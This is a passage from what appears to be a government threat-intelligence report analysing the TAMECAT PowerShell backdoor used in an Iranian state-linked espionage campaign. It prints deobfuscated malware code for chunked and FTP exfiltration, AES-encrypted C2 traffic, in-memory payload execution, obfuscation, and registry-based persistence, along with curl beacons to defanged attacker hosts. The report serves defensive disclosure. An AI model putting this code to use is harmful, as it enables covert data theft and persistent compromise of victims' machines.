upload.\r\nTo stream large files without loading them into PowerShell memory, TAMECAT uses a small managed helper named\r\nRuns.dll .\r\nChunked Exfiltration with Runs.dll Helper\r\nRuns.dll is a tiny .NET helper that reads a byte-range from a file and returns that slice (already Base64-encoded)\r\nto PowerShell. The module uses it to break large artifacts (archives, JSON dumps, screenshots) into 5 MB chunks\r\nand upload them.\r\nTAMECAT loads the DLL and creates the reader2.reader object, sets a 5 MB chunk size, and calculates how many\r\nchunks the file will be split into based on its total length. For each chunk, it calls the runs.dll function\r\nStart(startOffset, endOffset, FullPath) to read the specified byte range and return it as Base64, so the file can\r\nbe streamed piece by piece without loading the file into memory.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 22 of 48\n\nThe relevant deobfuscated code that divides data into chunks via runs.dll is shown below:\r\nPowerShell\r\n1\r\n# Load the helper\r\n2\r\nAdd-Type -Path $env:LOCALAPPDATA\\Caches\\Runs.dll\r\n3\r\n# Instantiate the class (namespace: reader2, class: reader)\r\n4\r\n$reader = New-Object reader2.reader\r\n5\r\n6\r\n# 5mb Chunk configuration\r\n7\r\n$ChunkSize = 5000000\r\n8\r\n$FileLen = (Get-Item $FullPath).Length\r\n9\r\n$Parts = [math]::Floor($FileLen / $ChunkSize) + 1\r\n10\r\n11\r\n# Per-chunk: call Runs.dll start() function, get the chunk as Base64 back\r\n12\r\n$chunkB64 = $reader.Start($startOffset, $endOffset, $FullPath)\r\nFigure 10: runs.dll loaded by TAMECAT to chunk data for exfiltration\r\nEach chunk is wrapped in a compact JSON envelope that contains the metadata required to reassemble, verify, and\r\ntrack the upload by the actor.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 23 of 48\n\nPowerShell\r\n1\r\n# Build the JSON envelope that carries this chunk\r\n2\r\n$envelope = @{\r\n3\r\ncmd = \"upload\"\r\n4\r\nfile_name = [IO.Path]::GetFileName($FullPath)\r\n5\r\nfile_size = $FileLen\r\n6\r\npart_index = $i + 1\r\n7\r\ntotal_parts = $Parts\r\n8\r\nchunk_size = $ChunkSize\r\n9\r\nchunk_data_b64 = $chunkB64\r\n10\r\ntimestamp_utc = Get-Date\r\n11\r\n} | ConvertTo-Json -Compress\r\nFigure 11: Structure of the JSON envelope used to carry each chunk\r\nTAMECAT reuses its C2 uploader implementation for exfiltration to reduce the number of distinct outbound\r\nconnections. The JSON envelope is encrypted as described in the Encryption section and then transferred over\r\nHTTPS to the configured endpoint.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 24 of 48\n\nWhen an envelope upload fails, the client retries and resumes from the last acknowledged offset rather than restarting\r\nthe entire transfer.\r\nFTP Exfiltration\r\nTAMECAT can also exfiltrate data over FTP as an alternate transport alongside HTTPS and the other C2 channels.\r\nWhen FTP is selected, the loader follows the same staged workflow used for other transports but adapts the transfer\r\nto the FTP protocol.\r\nFiles are uploaded with System.Net.FtpWebRequest in binary and passive mode. The loader builds ftp://URI ,\r\nsupplies a NetworkCredential object constructed from runtime-injected values, and writes the raw file bytes to the\r\nrequest stream.\r\nPowerShell\r\n1\r\n# global variables injected values\r\n2\r\n$ftpHost    = $global:FTPEndpoint\r\n3\r\n$ftpUser    = $global:FTPUser\r\n4\r\n$ftpPass    = $global:FTPPassword\r\n5\r\n$remotePath = \"[PATH]\"\r\n6\r\n$localFile  = \"[Exfiltrated File PATH]\"\r\n7\r\n...\r\n8\r\n# Build ftp uri\r\n9\r\n$uri = [Uri]::new(\"$ftpHost/$remotePath\")\r\n10\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 25 of 48\n\n...\r\n11\r\n# Create request and configure transport\r\n12\r\n$req = [System.Net.FtpWebRequest]::Create($uri)\r\n13\r\n$req.Method    = [System.Net.WebRequestMethods+Ftp]::UploadFile\r\n14\r\n$req.Credentials = New-Object System.Net.NetworkCredential($ftpUser, $ftpPass)\r\n15\r\n$req.UseBinary   = $true\r\n16\r\n$req.UsePassive = $true\r\n17\r\n...\r\n18\r\n# Read file bytes and upload\r\n19\r\n$bytes = [System.IO.File]::ReadAllBytes($localFile)\r\n20\r\n$req.ContentLength = $bytes.Length\r\n21\r\n$stream = $req.GetRequestStream()\r\n22\r\n$stream.Write($bytes, 0, $bytes.Length)\r\nFigure 12: FTP upload flow using System.Net.FtpWebRequest\r\nEvasion Masterclass: Inside TAMECAT's Stealth Tactics\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 26 of 48\n\nTAMECAT operates as a modular in-memory loader that uses trusted system binaries and temporary artifacts to\r\nblend in with normal activity and minimize on-disk traces. It employs various obfuscation techniques to evade\r\ndetection and complicate analysis.\r\nIn this section, we explore TAMECAT's sophisticated and stealthy execution methods.\r\nTAMECAT Encryption Mechanism\r\nTAMECAT protects telemetry and controller payloads with an in-memory AES-256 CBC encryption mechanism,\r\nwhich it uses to send and receive data covertly and securely. The first TAMECAT module place a couple of long-lived keys into global variables. Each request uses a fresh 16-character IV that is sent to the C2 so the actor can stay\r\nin sync. The mechanism is simple and repeatable by all TAMECAT modules:\r\n•\r\nUse the key from the global variable.\r\n•\r\nGenerate IV.\r\n•\r\nEncrypt the data as a JSON envelope with a key and IV.\r\n•\r\nSend the data alongside the IV in a header.\r\n•\r\nDecrypt responses using the same key and IV.\r\nThe initial module defines a global variable containing the AES key for later use, ensuring subsequent modules can\r\nencrypt and decrypt data.\r\nPowerShell\r\n1\r\n# runtime key set into $global:emlgwwjgbz\r\n2\r\n$global:emlgwwjgbz = \"g9944pf33sbuuuspi3z2er6rqh9ermxk\"\r\n3\r\n...\r\nFigure 13: The key is injected into a global variable by the first module\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 27 of 48\n\nEach module generates a random IV and uses AES-256-CBC to encrypt outbound payloads into Base64-encoded\r\nciphertext. The encryption function accepts 3 parameters: the data to encrypt, the AES key, and the IV.\r\nPowerShell\r\n1\r\nfunction IVGenerator() {\r\n2\r\n$letters = ([char[]](65..90) + [char[]](97..122))\r\n3\r\n-join (1..16 | ForEach-Object { $letters | Get-Random })\r\n4\r\n}\r\nFigure 14: per request IV generator function\r\nPowerShell\r\n1\r\nfunction AESEncryption {\r\n2\r\nparam($plainText, $keyText, $ivText)\r\n3\r\n$aes = [Security.Cryptography.Aes]::Create()\r\n4\r\n$aes.BlockSize = 128\r\n5\r\n$aes.KeySize   = 256\r\n6\r\n$aes.Key = [Text.Encoding]::UTF8.GetBytes($keyText)\r\n7\r\n$aes.IV  = [Text.Encoding]::UTF8.GetBytes($ivText)\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 28 of 48\n\n8\r\n$enc = $aes.CreateEncryptor($aes.Key, $aes.IV)\r\n9\r\n$ms = New-Object IO.MemoryStream\r\n10\r\n$cs = New-Object Security.Cryptography.CryptoStream $ms, $enc, [Security.Cryptography.CryptoStreamMode]::Write\r\n11\r\n$sw = New-Object IO.StreamWriter $cs\r\n12\r\n...\r\n13\r\n$base64 = [Convert]::ToBase64String($ms.ToArray())\r\n14\r\n...\r\n15\r\nreturn $base64\r\n16\r\n}\r\nFigure 15: AES 256 CBC encryption function\r\nThese functions construct outbound payloads and wrap them in JSON. The JSON contains the Base64 ciphertext and\r\nrelevant metadata. The module places the random IV in a header named Sec-Host, which is required for the actor to\r\ndecrypt the data.\r\nPowerShell\r\n1\r\n# key value fetched from the global variable\r\n2\r\n$key = $global:emlgwwjgbz\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 29 of 48\n\n3\r\n# random IV generation\r\n4\r\n$iv = IVGenerator\r\n5\r\n# Build envelope, encrypt with runtime key and per-request IV, send IV as Sec-Host\r\n6\r\n$envelope = '\u003cdata\u003e'\r\n7\r\n# call encryption function with key and iv\r\n8\r\n$cipher = AESEncryption -plainText $envelope -keyText $key -ivText $iv\r\n9\r\n# Send payload while inserting the IV into a header field named Sec-Host\r\n10\r\n$payload = @{ data = @{ json = $cipher }; \"Sec-Host\" = $iv } } | ConvertTo-Json\r\n11\r\n$http.open \"POST\", $c2url, $false\r\n12\r\n$http.setRequestHeader \"Content-type\", \"application/json\"\r\n13\r\n$http.setRequestHeader \"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"\r\n14\r\n$http.send ($payload)\r\nFigure 16: Encrypted mechanism used across TAMECAT's modules\r\nInbound payloads from C2 are decrypted in the same way using an AES key stored in a global variable and the IV\r\nsupplied in the message. The payload is parsed as JSON, processed with several string manipulations, and executed\r\nentirely in memory.\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 30 of 48\n\nPowerShell\r\n1\r\n# AES-256-CBC decrypt the same mechanism as encryption\r\n2\r\nfunction AESDecryption {\r\n3\r\nparam($cipherB64, $keyText, $ivText)\r\n4\r\n......\r\n5\r\n$decryptor = $aes.CreateDecryptor($aes.Key, $aes.IV)\r\n6\r\n$ms        = New-Object IO.MemoryStream ([Convert]::FromBase64String($cipherB64))\r\n7\r\n$cs        = New-Object Security.Cryptography.CryptoStream $ms, $decryptor,\r\n[Security.Cryptography.CryptoStreamMode]::Read\r\n8\r\n......\r\n9\r\n}\r\n10\r\n11\r\nfunction InboundPayloadHandler ($cipherB64, $ivText) {\r\n12\r\n13\r\n# decrypt using the shared runtime key and IV\r\n14\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 31 of 48\n\n$jsonPlain = AESDecryption -data $cipherB64 -key $global:emlgwwjgbz -iv $ivFromAttacker\r\n15\r\n16\r\nif ($jsonPlain -ne \"\" -and $jsonPlain -ne $null) {\r\n17\r\n$obj = $jsonPlain | ConvertFrom-Json\r\n18\r\n19\r\n# controller bundles are delivered as an array of chunks\r\n20\r\n[string[]]$chunks = $obj.TwuLwMA\r\n21\r\n...\r\n22\r\n23\r\n# Decode to script text\r\n24\r\n[string]$moduleText =\r\n[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($moduleB64))\r\n25\r\n26\r\n# Run in memory with invoke-expression\r\n27\r\n\u0026 (Get-Command '*ke-e*') $moduleText\r\n28\r\n  }\r\n29\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 32 of 48\n\n}\r\nFigure 17: In-memory inbound handler for decryption and execution.\r\nTAMECAT Code Obfuscation and Payload Stitching\r\nTAMECAT leans on noisy layers that look random but stitch into a predictable pattern. Payloads are split into dozens\r\nof base64 shards, reassembled at runtime, decrypted in memory, and executed through wildcard command resolution.\r\nNames are long and meaningless, delaying comprehension while keeping the core logic small and reusable.\r\nAcross this article, we showed a clean, minimally obfuscated slice for readability, but the live modules are far more\r\ncompact and obfuscated. This section describes some of TAMECAT's obfuscation techniques and shows original\r\ncode sections.\r\nOne technique reconstructs a payload from many encrypted fragments, decrypts the assembled blob, and runs the\r\nresult entirely in memory, or builds payloads from hundreds of indexed fragments.\r\nPowerShell\r\n1\r\n$QapHLAbPoV7 = \"YzaQcBnDE19kUpja9NvFS6GF/W5Mj3orIzloHKHwrTQuxAa8...\r\n{REDACTED}...AQam8SApRGbH8kvuu1/3LSbuqh\"\r\n2\r\n$GceYk8nH9D  = \"ZayEaOzek1uAcoCVxeWPMjahyHdU8zWhMLvWIwz3M9xT8u7P...\r\n{REDACTED}...BVhaKzjrmWvN2B4pOL2LCLESpc\"\r\n3\r\n$TnSxKpKw7Cm = \"N7XrsA7lkmzRRT0tgB1/khaNz/eM6AVT3MzYBMe6ojjN9F6k...\r\n{REDACTED}...NlDoSYY9AZfoAlVBRY8QomxHSo\"\r\n4\r\n$V4G20mrXfle = \"O4/b7Qb19mC1hLs27R8K1lzE4dZBqkyGvKL4obdwhdeeEds/...\r\n{REDACTED}...5iyfiCkOKteRRbhqJceJsVns2q\"\r\n5\r\n$WSETZrcqJz8 = \"lX+TI1r5F8ug45LhYjC1DJ2V/njc4MR4ePGvcGeFbcFuUgM2...\r\n{REDACTED}...j55j8ZPdSNgGhEiAWt59cCZ08V\"\r\n6\r\n$MIFyxzJQlVL = \"IMX6z9RlC8f6dZeSxk1B8BFXeBeincYdAy1jWLmfsgQs+ljY...\r\n{REDACTED}...bX28WnFRA/L/lffcPzWyJ2hleL\"\r\n7\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 33 of 48\n\n$hWX7ZZ8awFV = \"LJfj6sUOob/eU4rREgyStT/zmbldCBnLQNNjMaqhVZ5ohLtu...\r\n{REDACTED}...uUpdxNIBQgr9J0J23JCe40PuSq\"\r\n8\r\n$CEjKzdXzt7Q = \"CvBEDDPjKKFQ9Q61oaL8HrGF3dETsNybU844MeNHPpRP8PsF...\r\n{REDACTED}...tLzSeU3gWxB1/khaNzvONbRPsD\"\r\n9\r\n$aYpoinnbuuR = \"7BCP/1zuAOHn+U6WGZg+HD6EbN0qJao/ZF5Rj4VtWKHnZXrR...\r\n{REDACTED}...y86xswGHB1/khaNz/eM6AQMRH5\"\r\n10\r\n$4kJvAu3HPMB = \"8ra7MhKWg6n9phFaSoe2D+v0lu6VlpHH5+5Dk4U4WldD6v8G...\r\n{REDACTED}...NFhAIVMnH7B1/pR3FhC/wmKLa/\"\r\n11\r\n$gFTki6IHaUq = \"vDuttd0qo+ePJtlapqL7Z1OC0q/Z9iZfHAeKqOrw7POEDjuM...\r\n{REDACTED}...bclHfnak35lUA8Nr5IMSmk9QhS\"\r\n12\r\n$0FXZthzqeHP = \"wW9sqsto+jv0FzvPDcGagySWusAE/1d2cwDsqe5cEglrV44+...\r\n{REDACTED}...EB1/khaNz/eM6AVT3B1/khaFlF\"\r\n13\r\n$GFitrvN9eTI = \"h9G0WndXMBvRwTXz9eNHS57qx/exRJM9Q83tUGBTus4vDypu...\r\n{REDACTED}...289jW4ML89B1/khaNz/eM6AiOT\"\r\n14\r\n$Mukz45kpVZ0 = \"TCH08a0BsOCFKXlTnGme56jw1jPFc8rZZe6s6JfczwjIuR6U...\r\n{REDACTED}...YE9ey5zjB1/khaNz/eM6AVT39R\"\r\n15\r\n$PVoBqFYU478 = \"K5b8c/TJt+cMpZWaR7nY3D/TkriAYpt0cgbVmBlmOOaGE0sM...\r\n{REDACTED}...t+fAkpHQJfUvFGbQF3HblFEYc6\"\r\n16\r\n$S9hIpIiGUjV = \"rb6gTib3fK9epOzuYyTAytuszcCzjKsbGWw4vEnuFfNUOqLM...\r\n{REDACTED}...8NtX9YgAywPW8B1/khaNzP5CD2\"\r\n17\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 34 of 48\n\n$rSrLPl0TBHDo = \"1woq1lzeXsYlmCAuLskK9iYx+DhWvR5ZWxYtN2IOwSRQgl6F...\r\n{REDACTED}...xrWUpCB1/khaNz/eM6AVTIdlW\"\r\n18\r\n$QdS86omIsar = \"qDlYs+yyrQRiRz3UXVJA0xt48sFRLV9GDsIIBY+kmlIaJnbz...\r\n{REDACTED}...PqtQwK5RJM9Q83tRJM9Q83tdw6\"\r\n19\r\n$4ln6SFRvKLZ = \"bFYMyVb5kbhue/HoC0ChCwl1UuzoKP4mZfQwhidBPB24AmxF...\r\n{REDACTED}...pqtQwKRJM9Q83tRJM9Q83dd5w6\"\r\n20\r\n$LHe5eXFHAfy = \"Dr5eESCsbp0btnRJ7RVR6i3L3WeO1us4s5rB98fShmNOrMOh...\r\n{REDACTED}...lUp0zo/ZF5Rj4VtWKH4VtWKHnZ\"\r\n21\r\n$Pbtb3KdWPih = \"K1SALvhntxNYFANY4kx3KXETwoNRZRbAvrlqjQf3ePmzMUrf...\r\n{REDACTED}...8NkNPPuJKPHzC8/9vqThSTPVh5\"\r\n22\r\n$6E0VKZtCl6k = \"DeyRI1lggsYJxUtwEj3Y05mosIROcWfk1Fz8KtksdMDbNXiH...\r\n{REDACTED}...rM0yR7nY3D/TkriRbAvrlqjd9e\"\r\n23\r\n$xUHlwelH9n8 = \"hICpp7bmMScxJAOZpA27lJ2M8bTqPa1U6y91L62ogLzG8PjT...\r\n{REDACTED}...7/4j8spMORbAvrlqjEQyHjZqAd\"\r\n24\r\n$ARVcTt19uiS = \"FulUlZFYIGcq4A23KJZu84+uT15U/lKjKweqgLFBV4UN7EdX...\r\n{REDACTED}...81yib00RbAvrs5lqj6mP7v9srQ\"\r\n25\r\n$3STPdSzmYsl = \"en2g3Nxu6MRSBbLDMrKBADaWvU4zUDmEauM8Q3jmT8+WwQEy...\r\n{REDACTED}...GGUwRuwrMys5rB984TUa4jmagB\"\r\n26\r\n$f2SZXBufNqR = \"00vrUr9s/ubhSZXboWhn8Rjkoo70a/7DXqtdxm6H0oyyQ8I1...\r\n{REDACTED}...qMl2P3HrNhfF5rB98jFS6ozv1s\"\r\nFigure 18: Dozens of strings are stored in variables\r\nPowerShell\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 35 of 48\n\n1\r\n# Assign the base64 strings into an array\r\n2\r\n$ZBoX33QFfKdgZE = @(\r\n3\r\n$oapHLApBov7, $GceYk8nlH9D, $TnSxKpKw7Cm, $V4G20mrXfle, $WSETZrcqJz8,\r\n$MIFyxzJOlVL,\r\n4\r\n$hWXZ7Zz8wFV, $CEjKzdXzt7Q, $aYpoinnbuuR, $4kJvAu3HPMB, $gFTki6IHaUq,\r\n$0FXZthzqeHP,\r\n5\r\n$GFitrvN9eTI, $Mukz45kpVZ0, $PVoBqFYU478, $S9hIpIiUGjV, $rSrLPl0TBHDo, $QdS86omIsar,\r\n6\r\n$4ln6SFRvKLZ, $LHe5EXHAFv, $PBtb3KDWPlj, $dE0VKZtCl6k, $xUHiWelH9n8,\r\n$ARVcTt19uiS,\r\n7\r\n$3STPdSzmYsl, $4O7S2IlfVW4, $f2SZXBufNqR, $j4LhxRgZNAs, $1xGDQvAkBkg,\r\n$tnBXMxesAOy,\r\n8\r\n$w3Rxe8UqQyb, $rbydSW9iUWz, $6erQwzJsbfe, $nSjibO3iIO5, $XQEsDcfJyPB, $fKFrpqAI4OI,\r\n9\r\n$i2hTkjAapwG, $khzr4pdQuAZ, $fqHC0dyiobc, $uG8ZsSK4kFE, $4EVITpBAT5C, $jmExzgCAyvy,\r\n10\r\n$HUtkxenYzm2, $zLt0W64tOXMO, $kAEv1GPetZ5, $MMiiqYTKy4k, $GPNqAnY1dqp,\r\n$WqoVM2BUIIZ,\r\n11\r\n$HPzPWvaCt2q, $kj4YzU1tewu, $SrrDB30rNJo, $YI19jkF78jk, $ZWERzweq0Nf, $yg1jQkR5fE0,\r\n12\r\n$tWgYhztYX7r, $1IC6EWQBuDQN\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 36 of 48\n\n13\r\n)\r\n14\r\n15\r\n# Assemble fragments at runtime\r\n16\r\n$ASBLBdU = \"\"\r\n17\r\nforeach ($id in $ZBoX33QFfKdgZE) { $ASBLBdU += $id }\r\n18\r\n$ASBLBdU = $ASBLBdU.Trim()\r\n19\r\n20\r\n# decrypt and run in memory\r\n21\r\n$gIBoIu38LeWRVZLc = f8qnfbxr($ASBLBdU)\r\n22\r\n\u0026 (gcm i*?-e*n) $gIBoIu38LeWRVZLc\r\nFigure 19: Build and run a giant base64-encrypted payload from many small pieces\r\nPowerShell\r\n1\r\nluelriciuewwubjtc ( $tpf[6]+ $zxr[0]+ $mhx[1]+ $yk6[3]+ $ul0[7]+ $zoo[0]+ $mxe[5]+ $dof[0]+\r\n$kzm[0]+ $smn[0]+ $pko[0]+ $zdu[1]+ $sc1[3]+ $scb[6]+ $you[0]+ $pmj[1]+ $pio[0]+ $seq0[4]+\r\n$lba[1]+ $spo[7]+ ... $tok[3]+ $ofm[0]+ $xfa[3]) @( \"$global:emlgwwjgbz\", \"$global:qraznczsewhv\",\r\n\"$global:zxcxjmutuxhv\", \"$global:nhprewmg\", \"$global:ahennlazfxwfydhaxo\", \"$global:fxuadbcdn\" )\r\nFigure 20: Payload assembled from hundreds of indexed fragments\r\nAnother technique in TAMECAT's arsenal appears when the loader receives a controller payload from C2. The\r\nloader injects live configuration into the unpacker at runtime, so the decrypted module receives fresh endpoints and\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 37 of 48\n\ncredentials only when it runs. This keeps static samples sterile and forces analysts to capture runtime state to recover\r\nthe true C2 addresses, keys, and webhook values. The pattern is straightforward and effective:\r\nThe loader defines a set of global variables, and the unpacker replaces short placeholder tokens in the decrypted\r\nscript with global variables before compiling and executing the result in memory.\r\nPowerShell\r\n1\r\n# runtime globals injected by the loader\r\n2\r\n$global:C2Endpoint    = \"hxxps[://]zx3nkaavlai[.]map[.]azionedge[.]net\"\r\n3\r\n$global:DiscordChannel  = \"hxxps://discord[.]com/api/channels/{REDACTED}\"\r\n4\r\n$global:EncryptionKey  = \"g9944pf33sbuuuspi3z2er6rqh9ermxk\"\r\n5\r\n.....\r\n6\r\n# Decode and decrypt the ciphertext into plaintext script\r\n7\r\n.....\r\n8\r\n# swap short tokens inside the decrypted script for the live globals\r\n9\r\ntry {\r\n10\r\n$decryptedScript = $decryptedScript.Replace($placeholderArray[1], '$global:C2Endpoint')\r\n11\r\n$decryptedScript = $decryptedScript.Replace($placeholderArray[0], '$global:EncryptionKey')\r\n12\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 38 of 48\n\n$decryptedScript = $decryptedScript.Replace($placeholderArray[4], '$global:DiscordBot')\r\n13\r\n.....\r\n14\r\n}\r\n15\r\n# compile and run in memory so the final controller\r\n16\r\n$scriptblock = [Scriptblock]::Create($decryptedScript)\r\n17\r\n\u0026 $scriptblock\r\nFigure 21: Global variables are placed into the decrypted payload\r\nLiving-off-the-Land Binaries (LOLBins)\r\nTAMECAT relies on trusted, signed Windows binaries and common user tools. In addition to using PowerShell's\r\npowerful features, the actor leverages other trusted binaries, including conhost.exe , cmd.exe , curl.exe , and\r\nmsedge.exe , to make malicious actions appear as normal system activity.\r\nConhost.exe is a signed console broker that can host console workloads without displaying a window. TAMECAT\r\nuses Conhost to run a bat script in the background:\r\nconhost --headless C:\\Users\\Public\\Microsoft.bat\r\nTAMECAT uses curl.exe to send and receive information between the compromised host and the attacker C2\r\nservers. Example of a POST request sent by curl and used as a telemetry or beacon channel:\r\ncurl.exe -X POST \"https://\u003cFIREBASE-ENDPOINT\u003e.json\" -H\r\n\"Content-Type: application/json\" -d \"{\\\"LastUpdatTime\\\":{\\\".sv\\\":\\\"timestamp\\\"}}\"\r\n--ssl-no-revoke\"\r\nTAMECAT also leveraged msedge.exe to harvest personal browser data, as described in the Data Harvesting\r\nsection above.\r\nUser Deception via Fake Document\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 39 of 48\n\nTo minimize user suspicion, TAMECAT executes a PowerShell routine that launches a OneDrive document in Edge,\r\nsimulating legitimate user activity while the in-memory loader runs in the background. TAMECAT initiates MSEdge\r\nto show benign content:\r\nstart msedge \\\"\"hxxps[://]1drv[.]ms/w/c/208F0gfdtrhkjB256/EXaIieylg5EtG6mcLAdhtdhgdytrfHM31tA?e=pjdsyyI\\\";\r\nMemory-Resident Operations and Reduced Forensic Traces\r\nTAMECAT executes most of its functionality directly in memory. Earlier Google reports indicate that the malware\r\nwas writing a victim identifier to %LOCALAPPDATA%\\config.txt . In the sample we analyzed, that identifier is instead\r\nstored in the user registry key HKCU:\\SOFTWARE\\MSCore\\config , reflecting the actor's ongoing efforts to minimize\r\non-disk artifacts and reduce forensic detection. This demonstrates TAMECAT's evolution toward stealthier, memory-resident operations with a smaller disk footprint.\r\nLeveraging Cloudflare Workers for Resilient C2\r\nTAMECAT leverages Cloudflare Workers (e.g., *.workers.dev ) as a serverless C2 edge, offering significant\r\nadvantages to the adversary. Traffic to Cloudflare blends seamlessly with normal web browsing and is widely\r\npermitted, while the edge conceals the true origin infrastructure. This setup simplifies maintenance and delivers low-noise, resilient command traffic that is difficult to block with simple network rules. The use of Cloudflare's\r\ninfrastructure, including Workers, for staging and command-and-control has become increasingly common in APT\r\ncampaigns over the past few years.\r\nSurviving the Reboot - TAMECAT's Persistence Mechanisms\r\n\"Renovation\" Run Key\r\nTAMECAT persistence module drops a disposable batch file ( v.bat ) in the user's Internet Explorer profile under a\r\nList folder, and by creating a per-user Run registry key named Renovation.\r\nThe command enumerates all items in the List folder and starts each one.\r\nPowerShell\r\n1\r\nSet-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' -Name\r\n'Renovation' -Value \"cmd /c \\\"for %a in (\\\"%localappdata%\\Microsoft\\Internet Explorer\\List\\*\\\") do (\r\nstart \\\"\\\" \\\"%a\\\" )\\\"\"\r\nFigure 22: Creation of the Renovation Run value that launches every file in the List directory at logon\r\nThis key executes v.bat at every interactive logon, which in turn launches the backdoor\r\n( fhgPczTORoCNEDsm.txt ). The batch file is obfuscated with randomized noise tokens that are stripped at runtime to\r\nreconstruct a command executing the loader in memory via PowerShell:\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 40 of 48\n\nPowershell -w 1 \"$PbwpcDxXtAnaGrsu=(Get-Content -Path\r\nC:\\Users\\victim\\AppData\\Local\\Microsoft\\Windows\\AutoUpdate\\fhgPczTORoCNEDsm.txt);\r\n\u0026(gcm i*x)$PbwpcDxXtAnaGrsu\"\r\nBefore creating the Renovation Run key, the sample sets console compatibility values so the command prompt\r\nenvironment behaves predictably when the staging loop runs. Specifically, the actor writes DelegationConsole and\r\nDelegationTerminal registry values that point command-line handling to conhost.exe and ensure child processes\r\nlaunched from the console run in the expected terminal host. Setting these values before creating the Run entry\r\nensures launched commands inherit a consistent console host context, reducing the chance that alternative terminal\r\nhosts or compatibility settings will break the loader.\r\nPowerShell\r\n1\r\n# Ensure the Console\\%Startup% registry key exists for the current user\r\n2\r\n$consoleKeyPath = \"HKCU:\\Console\\%Startup%\"\r\n3\r\n4\r\nif (-not (Test-Path -Path $consoleKeyPath)) {\r\n5\r\nNew-Item -Force -ItemType Directory -Path $consoleKeyPath\r\n6\r\n}\r\n7\r\n8\r\n# GUID used to direct console hosting to conhost.exe\r\n9\r\n$consoleGuid = \"{B23D10C0-E52E-411E-9D5B-C09DF709C7D}\"\r\n10\r\n11\r\n# Set DelegationConsole and DelegationTerminal so launched consoles use the expected host\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 41 of 48\n\n12\r\nNew-ItemProperty -Force -Path $consoleKeyPath -Name \"DelegationConsole\" -PropertyType String -\r\nValue $consoleGuid\r\n13\r\nNew-ItemProperty -Force -Path $consoleKeyPath -Name \"DelegationTerminal\" -PropertyType String -\r\nValue $consoleGuid\r\nFigure 23: Creation of DelegationConsole and DelegationTerminal registry values\r\nThe \"UserInitMprLogonScript\" Mechanism\r\nAn auxiliary persistence channel is maintained via a hidden batch script named Microsoft.bat , configured to run at\r\nevery logon via the per-user UserInitMprLogonScript registry key.\r\nThis script acts as a lightweight beacon, communicating with a Firebase Realtime Database under a per-host path\r\n(e.g., OutlookStandaloneUpdate/\u003chost-id\u003e ), posting server-side timestamps to signal host availability:\r\nBatch\r\n1\r\nchcp 65001\r\n2\r\ncurl -X GET \"hxxps://{REDACTED}.firebaseio[.]com/OutlookStandaloneUpdate/\u003chost-id\u003e/LastUpdate.json\" --ssl-no-revoke\r\n3\r\ncurl -X POST \"hxxps://{REDACTED}.firebaseio[.]com/OutlookStandaloneUpdate/\u003chost-id\u003e.json\" ^\r\n4\r\n  -H \"Content-Type: application/json\" ^\r\n5\r\n  -d \"{\\\"LastUpdateTime\\\":{\\\"\\\\x2esv\\\":\\\"timestamp\\\"}}\" --ssl-no-revoke\r\nFigure 24: Reconstructed Microsoft.bat content\r\nThe registry value set to enable this:\r\nPowerShell\r\n1\r\n# Using the per-user HKU path for the targeted SID\r\nhttps://web.archive.org/web/20251113165018/https://govextra.gov.il/national-digital-agency/cyber/research/spearspecter/\r\nPage 42 of 48\n\n2\r\n$envPath = \"HKU:\\\u003cSID\u003e\\Environment\"\r\n3\r\nSet-ItemProperty -Path $envPath -Name \"UserInitMprLogonScript\" -Value \"conhost --headless\r\nC:\\Users\\Public\\Microsoft.bat\"\r\nFigure 25: Creation of UserInitMprLogonScript registry value\r\nSpearSpecter Infrastructure \u0026 Attribution Breakdown\r\nOur investigation assesses with high confidence that the SpearSpecter campaign is operated by Iranian state-aligned\r\noperators working on behalf of, or in close coordination with, the Islamic Revolutionary Guard Corps Intelligence\r\nOrganization (IRGC-IO). This conclusion is based on robust technical evidence, including distinctive infrastructure\r\npatterns, highly tailored social-engineering tradecraft, and the deployment of custom malware such as TAMECAT,\r\nall of which are consistent with operations publicly attributed to APT42 and related IRGC-IO units.\r\nThe SpearSpecter campaign's infrastructure reflects a sophisticated blend of agility, stealth, and operational security\r\ndesigned to sustain prolonged espionage against high-value targets. The operators leverage a multifaceted\r\ninfrastructure that combines legitimate cloud services with attacker-controlled resources, 